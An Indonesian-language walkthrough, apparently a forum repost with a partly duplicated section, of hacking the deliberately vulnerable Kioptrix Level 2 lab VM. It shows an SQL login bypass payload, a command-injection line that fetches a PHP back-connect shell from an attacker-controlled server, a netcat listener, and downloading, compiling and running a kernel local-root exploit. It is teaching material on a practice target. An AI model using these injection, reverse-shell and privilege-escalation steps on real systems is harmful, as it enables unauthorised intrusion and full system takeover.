<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Jalankan di Oracle VM.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">nanti tampilanya seperti ini .</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-Ri2sjEaGS9g/Vt91o4t-CRI/AAAAAAAAAu4/brPHQQII0Os/s1600/kipotrix-linuxsec_org.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://4.bp.blogspot.com/-Ri2sjEaGS9g/Vt91o4t-CRI/AAAAAAAAAu4/brPHQQII0Os/s320/kipotrix-linuxsec_org.png" width="320" height="180" alt="[Image: kipotrix-linuxsec_org.png]" class="mycode_img" /></span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Nah seperti yang terlihat, disitu kalian tidak bisa masuk ke OS nya . Harus login . Dan kita tidak tau password nya apa, sehingga untuk mendapatkan akses kedalam nya kita harus menemukan celah.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Yep.. saatnya penetrasi.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Sebagai catatan, OS yang saya gunakan adalah Ubuntu yang sudah dilengkapi dengan tools pentest dari BackBox.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Oke, pertama, kita harus tau IP dari Kioptrix ini terlebih dahulu.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Kita scan via nmap.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">uzumaki@linuxsec:~&#36; nmap -sn 192.168.43.1/24</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">-sn sendiri adalah perintah ping scan, maka akan terlihat host mana saja yang up. Berhubung yang saya gunakan adalah wifi pribadi, sehingga mudah saya ditemukan ip nya.</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-x0NDY47SvR0/Vt93nut1EeI/AAAAAAAAAvE/S2STZkXCerY/s1600/kioptrix-linuxsec_org.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://4.bp.blogspot.com/-x0NDY47SvR0/Vt93nut1EeI/AAAAAAAAAvE/S2STZkXCerY/s320/kioptrix-linuxsec_org.png" width="320" height="109" alt="[Image: kioptrix-linuxsec_org.png]" class="mycode_img" /></span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Setelah itu, buka IP Kioptrix tadi via browser.</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-WnY77rUgZfk/Vt9374ij5cI/AAAAAAAAAvI/dMP9aeqV4HE/s1600/kioptrix-linuxsec_org.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://4.bp.blogspot.com/-WnY77rUgZfk/Vt9374ij5cI/AAAAAAAAAvI/dMP9aeqV4HE/s320/kioptrix-linuxsec_org.png" width="320" height="108" alt="[Image: kioptrix-linuxsec_org.png]" class="mycode_img" /></span></a></span></span></span></div>
<br />
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Kita coba bypass sql login dengan user dan password <span style="font-weight: bold;" class="mycode_b">'=' 'or'</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Ternyata tembus.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Bagi yang belum tau tentang Bypass SQL Login, bisa baca baca disini :</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="http://exploit.linuxsec.org/2014/02/tutorial-hack-website-dengan-bypass-sql.html" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">Tutorial Bypass Admin Login Website</span></a></span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-XNl4gTP_Z80/Vt94yTeCdVI/AAAAAAAAAvY/fQfCS0cKmTw/s1600/kioptrix-linuxsec_org.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://4.bp.blogspot.com/-XNl4gTP_Z80/Vt94yTeCdVI/AAAAAAAAAvY/fQfCS0cKmTw/s320/kioptrix-linuxsec_org.png" width="320" height="109" alt="[Image: kioptrix-linuxsec_org.png]" class="mycode_img" /></span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Saya skip skip saja ya tulisannya. Di akhir tulisan nanti saya lampirkan video nya jika kurang jelas.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Setelah beberapa kali dilakukan percobaan akhirnya diketahui kalau selain untuk pelakukan ping, kolom diatas juga bisa melakukan perintah perintah linux.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Tentu saja dengan command injection.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Disini saya akan melakukan back connect sehingga saya mengupload BackConnect Shell ke target.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">command nya :</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">;wget http://serverkita/shell.txt -O /tmp/shell.php</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Kita mengupload di folder /tmp karena hanya folder itu yang writable.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Untuk Shell nya silahkan download disini :</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="http://pastebin.com/dri7LrLF" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">Download Back Connect Shell</span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Sesuaikan sendiri untuk ip dan port nya.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Selanjutya, kita buka terminal di main OS.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">masukkan command :</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">uzumaki@linuxsec:~&#36; sudo nc -l 1337</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">1337 adalah port yang saya gunakan untuk back connect . Sama kan dengan yang ada di shell.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Nah , di web Kioptrix nya tadi, masukkan command :</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">;php /tmp/shell.php</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Sesuaikan dengan nama shell mu.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Maka di terminal akan terbuka shell, namun masih regular user.</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-HMSlnUmShBQ/Vt97l0F7PyI/AAAAAAAAAvk/-HzTuvXFiig/s1600/kioptrix-linuxsec_org.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://4.bp.blogspot.com/-HMSlnUmShBQ/Vt97l0F7PyI/AAAAAAAAAvk/-HzTuvXFiig/s320/kioptrix-linuxsec_org.png" width="320" height="86" alt="[Image: kioptrix-linuxsec_org.png]" class="mycode_img" /></span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Sekarang masukkan command uname -a untuk mengetahui versi kernel yang digunakan target.</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://1.bp.blogspot.com/-IgYAbJXA_HI/Vt98AOvqAiI/AAAAAAAAAvo/G5ntucWzDEI/s1600/kioptrix-linuxsec_org.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://1.bp.blogspot.com/-IgYAbJXA_HI/Vt98AOvqAiI/AAAAAAAAAvo/G5ntucWzDEI/s320/kioptrix-linuxsec_org.png" width="320" height="54" alt="[Image: kioptrix-linuxsec_org.png]" class="mycode_img" /></span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Nah, kernel yang digunakan lumayan sudah tua. jadi kemungkinan ada di Exploit-DB . kalian bisa cek sendiri di exploit-db dengan memasukkan versi kernel yang tertera.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Berhubung saya punya searchsploit, saya tinggal mencari nya lewat terminal.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">bagi yang ingin menginstall bisa ikuti tutorial dibawah ini :</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="http://www.linuxsec.org/2015/12/searchsploit.html" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">Cara Install Searchsploit di Ubuntu Linux</span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Oke lanjut, masukkan command :</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">uzumaki@linuxsec:~&#36; searchsploit kernel 2.6 root</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Itu keyword yang saya gunakan untuk mencari localroot kernel 2.6 yang digunakan kioptrix.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Ada banyak output nya. Saya coba yang<span style="font-weight: bold;" class="mycode_b"> ring0 Root Exploit</span>.</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://2.bp.blogspot.com/-fLtpGwjLcFE/Vt99j-cjRdI/AAAAAAAAAv4/vyG9wKN1UlU/s1600/kioptrix-linuxsec_org.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://2.bp.blogspot.com/-fLtpGwjLcFE/Vt99j-cjRdI/AAAAAAAAAv4/vyG9wKN1UlU/s320/kioptrix-linuxsec_org.png" width="320" height="180" alt="[Image: kioptrix-linuxsec_org.png]" class="mycode_img" /></span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Lalu kita copy file .c nya ke /var/www/html agar bisa didownload.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">uzumaki@linuxsec:~&#36; cp /path/to/searchsploit/localroot.c /var/www/html/root.c</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Selanjutnya dari shell yang didapat dari back connect sebelumnya, kita download dan kita compile exploit tadi.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">sh-3.00&#36; cd /tmp</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">sh-3.00&#36; wget http://serverkita/root.c /tmp/root.c</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">sh-3.00&#36; gcc root.c -o rootme</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">sh-3.00&#36; chmod +x rootme</span></span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://3.bp.blogspot.com/-6Y0cOyEVPhU/Vt9-_JGZ5nI/AAAAAAAAAwE/NtnQQj1TZTc/s1600/kioptrix-linuxsec_org.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://3.bp.blogspot.com/-6Y0cOyEVPhU/Vt9-_JGZ5nI/AAAAAAAAAwE/NtnQQj1TZTc/s320/kioptrix-linuxsec_org.png" width="320" height="188" alt="[Image: kioptrix-linuxsec_org.png]" class="mycode_img" /></span></a></span></span></span></div>
<br />
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Lalu kita jalankan exploit nya dengan command :</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">sh-3.00&#36; ./rootme</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Maka kalian akan masuk ke root.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">sh-3.00# whoami</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: blue;" class="mycode_color">root</span></span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://3.bp.blogspot.com/-OsM_KGTw4Rc/Vt9_hPqeYsI/AAAAAAAAAwI/YDbHSybjKxQ/s1600/kioptrix-linuxsec_org.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://3.bp.blogspot.com/-OsM_KGTw4Rc/Vt9_hPqeYsI/AAAAAAAAAwI/YDbHSybjKxQ/s320/kioptrix-linuxsec_org.png" width="390" height="129" alt="[Image: kioptrix-linuxsec_org.png]" class="mycode_img" /></span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Misi terselesaikan..</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Bagi yang kurang jelas bisa lihat video dibawah :</span></span></span></div>
<br />
<!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/0NSfRqvgIkE" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --><br />
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Mungkin kurang menantang bagi kalian yang sudah expert di bidang pentesting, tapi sekali lagi tujuan dari Kioptrix sendiri adalah untuk pembelajaran dasar, sehinga lebih diperuntukkan kepada pemula yang ingin tahu bagaimana alur serangan dilakukan.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">jadi buat kalian yang masih awam, silahkan mencoba.</span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Sekian tutorial kali ini, semoga bermanfaat, share juga ke teman temanmu biar mereka tau.</span></span></span>]]></description>
			<content:encoded><![CDATA[<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Kali ini saya akan menulis pembahasan dari Kioptrix Level 2 Challenge. Kioptrix sendiri adalah Oracle VM Image yang dirancang khusus untuk mendalami dasar dasar dari keamanan website dan jaringan. Jadi OS nya memang didesain vulnerable. Goal dari challenge Kioptrix sendiri adalah mendapatkan root access dari OS tadi, bagaimanapun cara nya. Sehingga kita bebas untuk masuk melalui celah apapun yang terbuka.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Oke langsung saja ya.</span></span></span><br />
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="http://www.kioptrix.com/dlvm/Kioptrix_Level_2.rar" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">Download Kioptrix Level 2</span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Jalankan di Oracle VM.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">nanti tampilanya seperti ini .</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-Ri2sjEaGS9g/Vt91o4t-CRI/AAAAAAAAAu4/brPHQQII0Os/s1600/kipotrix-linuxsec_org.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://4.bp.blogspot.com/-Ri2sjEaGS9g/Vt91o4t-CRI/AAAAAAAAAu4/brPHQQII0Os/s320/kipotrix-linuxsec_org.png" width="320" height="180" alt="[Image: kipotrix-linuxsec_org.png]" class="mycode_img" /></span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Nah seperti yang terlihat, disitu kalian tidak bisa masuk ke OS nya . Harus login . Dan kita tidak tau password nya apa, sehingga untuk mendapatkan akses kedalam nya kita harus menemukan celah.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Yep.. saatnya penetrasi.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Sebagai catatan, OS yang saya gunakan adalah Ubuntu yang sudah dilengkapi dengan tools pentest dari BackBox.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Oke, pertama, kita harus tau IP dari Kioptrix ini terlebih dahulu.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Kita scan via nmap.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">uzumaki@linuxsec:~&#36; nmap -sn 192.168.43.1/24</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">-sn sendiri adalah perintah ping scan, maka akan terlihat host mana saja yang up. Berhubung yang saya gunakan adalah wifi pribadi, sehingga mudah saya ditemukan ip nya.</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-x0NDY47SvR0/Vt93nut1EeI/AAAAAAAAAvE/S2STZkXCerY/s1600/kioptrix-linuxsec_org.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://4.bp.blogspot.com/-x0NDY47SvR0/Vt93nut1EeI/AAAAAAAAAvE/S2STZkXCerY/s320/kioptrix-linuxsec_org.png" width="320" height="109" alt="[Image: kioptrix-linuxsec_org.png]" class="mycode_img" /></span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Setelah itu, buka IP Kioptrix tadi via browser.</span></span></span></div>
